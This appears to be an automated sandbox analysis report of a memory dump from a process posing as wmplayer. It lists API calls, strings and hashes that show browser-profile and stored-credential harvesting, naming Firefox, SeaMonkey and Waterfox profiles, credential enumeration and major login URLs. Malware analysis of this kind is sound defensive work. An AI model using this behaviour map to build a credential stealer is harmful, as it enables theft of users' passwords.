                                                                                            • Opcode Fuzzy Hash: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                                                            • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                              • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                              • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                            • memset.MSVCRT ref: 0040BC75
                                                                                            • memset.MSVCRT ref: 0040BC8C
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                            • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                            • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                            • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                            • String ID:
                                                                                            • API String ID: 115830560-3916222277
                                                                                            • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                            • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                            • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                            • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                                            Control-flow Graph
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                            • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                            • GetLastError.KERNEL32 ref: 0041847E
                                                                                            • free.MSVCRT ref: 0041848B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFile$ErrorLastfree
                                                                                            • String ID: |A
                                                                                            • API String ID: 77810686-1717621600
                                                                                            • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                            • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                            • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                            • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0041249C
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                            • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                            • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                            • wcscpy.MSVCRT ref: 004125A0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                            • String ID: r!A
                                                                                            • API String ID: 2791114272-628097481
                                                                                            • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                            • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                            • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                            • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                            APIs
                                                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                              • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                              • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                              • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                              • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                              • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                              • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                              • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                              • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                              • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                              • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                              • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                              • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                            • _wcslwr.MSVCRT ref: 0040C817
                                                                                              • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                              • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                            • wcslen.MSVCRT ref: 0040C82C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                            • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                            • API String ID: 2936932814-4196376884
                                                                                            • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                            • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                            • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                            • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                            • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                            • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                            • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                            • String ID: BIN
                                                                                            • API String ID: 1668488027-1015027815
                                                                                            • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                            • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                            • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                            • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                            APIs
                                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                            • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                            • wcslen.MSVCRT ref: 0040BE06
                                                                                            • wcsncmp.MSVCRT ref: 0040BE38
                                                                                            • memset.MSVCRT ref: 0040BE91
                                                                                            • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                            • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                            • wcschr.MSVCRT ref: 0040BF24
                                                                                            • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                            • String ID:
                                                                                            • API String ID: 697348961-0
                                                                                            • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                            • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                            • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                            • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00403CBF
                                                                                            • memset.MSVCRT ref: 00403CD4
                                                                                            • memset.MSVCRT ref: 00403CE9
                                                                                            • memset.MSVCRT ref: 00403CFE
                                                                                            • memset.MSVCRT ref: 00403D13
                                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                            • memset.MSVCRT ref: 00403DDA
                                                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                            • String ID: Waterfox$Waterfox\Profiles
                                                                                            • API String ID: 3527940856-11920434
                                                                                            • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                            • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                            • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                            • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00403E50
                                                                                            • memset.MSVCRT ref: 00403E65
                                                                                            • memset.MSVCRT ref: 00403E7A
                                                                                            • memset.MSVCRT ref: 00403E8F
                                                                                            • memset.MSVCRT ref: 00403EA4
                                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                            • memset.MSVCRT ref: 00403F6B
                                                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                            • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                            • API String ID: 3527940856-2068335096
                                                                                            • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                            • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                            • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                            • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00403FE1
                                                                                            • memset.MSVCRT ref: 00403FF6
                                                                                            • memset.MSVCRT ref: 0040400B
                                                                                            • memset.MSVCRT ref: 00404020
                                                                                            • memset.MSVCRT ref: 00404035
                                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                            • memset.MSVCRT ref: 004040FC
                                                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                            • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                            • API String ID: 3527940856-3369679110
                                                                                            • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                            • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                            • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                            • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                            APIs
                                                                                            • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy
                                                                                            • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                            • API String ID: 3510742995-2641926074
                                                                                            • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                            • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                            • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                            • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                            APIs
                                                                                              • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                              • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                              • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                            • memset.MSVCRT ref: 004033B7
                                                                                            • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                            • wcscmp.MSVCRT ref: 004033FC
                                                                                            • _wcsicmp.MSVCRT ref: 00403439
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                            • String ID: $0.@
                                                                                            • API String ID: 2758756878-1896041820
                                                                                            • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                            • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                            • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                            • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                            APIs
                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                            • String ID:
                                                                                            • API String ID: 2941347001-0
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00403C09
                                                                                            • memset.MSVCRT ref: 00403C1E
                                                                                              • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                              • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                            • wcscat.MSVCRT ref: 00403C47
                                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                            • wcscat.MSVCRT ref: 00403C70
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: memsetwcscat$Closewcscpywcslen
                                                                                            • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                            • API String ID: 3249829328-1174173950
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040A824
                                                                                            • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                            • wcscpy.MSVCRT ref: 0040A854
                                                                                            • wcscat.MSVCRT ref: 0040A86A
                                                                                            • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                            • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                            • String ID:
                                                                                            • API String ID: 669240632-0
                                                                                            APIs
                                                                                            • wcschr.MSVCRT ref: 00414458
                                                                                            • _snwprintf.MSVCRT ref: 0041447D
                                                                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                            • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                            • String ID: "%s"
                                                                                            • API String ID: 1343145685-3297466227
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                            • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                            • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProcProcessTimes
                                                                                            • String ID: GetProcessTimes$kernel32.dll
                                                                                            • API String ID: 1714573020-3385500049
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004087D6
                                                                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                              • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                            • memset.MSVCRT ref: 00408828
                                                                                            • memset.MSVCRT ref: 00408840
                                                                                            • memset.MSVCRT ref: 00408858
                                                                                            • memset.MSVCRT ref: 00408870
                                                                                            • memset.MSVCRT ref: 00408888
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                            Similarity
                                                                                            • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                            • String ID:
                                                                                            • API String ID: 2911713577-0
                                                                                            APIs
                                                                                            • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                            • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                            • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: memcmp
                                                                                            • String ID: @ $SQLite format 3
                                                                                            • API String ID: 1475443563-3708268960
                                                                                            APIs
                                                                                              • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                            • memset.MSVCRT ref: 00414C87
                                                                                            • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                            • wcscpy.MSVCRT ref: 00414CFC
                                                                                              • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                            Strings
                                                                                            • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                            Similarity
                                                                                            • API ID: AddressCloseProcVersionmemsetwcscpy
                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                            • API String ID: 2705122986-2036018995
                                                                                            APIs
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: _wcsicmpqsort
                                                                                            • String ID: /nosort$/sort
                                                                                            • API String ID: 1579243037-1578091866
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040E60F
                                                                                            • memset.MSVCRT ref: 0040E629
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
